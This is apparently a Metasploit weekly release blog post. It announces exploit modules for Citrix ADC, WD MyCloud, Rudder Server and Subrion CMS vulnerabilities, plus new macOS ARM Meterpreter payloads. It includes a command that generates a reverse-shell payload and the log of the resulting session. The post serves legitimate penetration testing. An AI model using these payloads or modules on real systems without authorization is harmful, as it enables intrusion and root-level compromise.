Last updated at Thu, 10 Aug 2023 21:19:25 GMT
Fly High in the Sky With This New Cloud Exploit!
This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!
OSX Meterpreter support for M1 and M2 devices
Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.
The new payloads are:
Example of generating a payload:
msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1 [*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...
After executing the payload on the remote host, the session will open and can be interacted with:
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > [*] Transmitting first stager...(328 bytes) [*] Transmitting second stager...(65536 bytes) [*] Sending stage (812819 bytes) to 127.0.0.1 [*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500 msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1 [*] Starting interaction with 5... meterpreter > getuid Server username: demo meterpreter > sysinfo Computer : demo.local OS : macOS Ventura (macOS 13.2.0) Architecture : arm64 BuildTuple : aarch64-apple-darwin Meterpreter : aarch64/osx meterpreter >
Metasploit takes to the road
Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.
- Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
- DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom
New module content (10)
Citrix ADC (NetScaler) Forms SSO Target RCE
Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Pull request: #18240 contributed by zeroSteiner
AttackerKB reference: CVE-2023-3519
Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the
nsppe process which runs as root.
Western Digital MyCloud unauthenticated command injection
Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Pull request: #18221 contributed by ErikWynter
AttackerKB reference: CVE-2018-17153
Description: This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage an authentication bypass followed by injecting a simple
echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.
Rudder Server SQLI Remote Code Execution
Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.
Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE
Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Pull request: #18211 contributed by ismaildawoodjee
AttackerKB reference: CVE-2018-19422
Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the
.htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.
AWS Instance Connection
Description: This adds AWS instance connection sessions.
OSX AArch64 Payload Support
Description: Adds new support for multiple OSX AArch64 payloads:
osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.
Enhancements and features (4)
- #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
- #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the
- #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API
- #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.
Bugs fixed (6)
- #18203 from adfoster-r7 - Fixes a crash when running the
scanner/ssh/libssh_auth_bypassmodule on newer versions of Ruby.
- #18209 from adfoster-r7 - This fixes an issue in the
windows/local/bypassuac_comhijackexploit module, which was breaking due to a syntax error.
- #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if
user32was not already loaded.
- #18238 from dwelch-r7 - Fixes an issue where when setting
PASS_FILEwith scanner modules. Previously the first username in the
USER_FILEwould not be tested against any password in
PASS_FILE, this is now fixed.
- #18243 from adfoster-r7 - This PR fixes an issue were an appscan import would fail due to an empty proof.
- #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).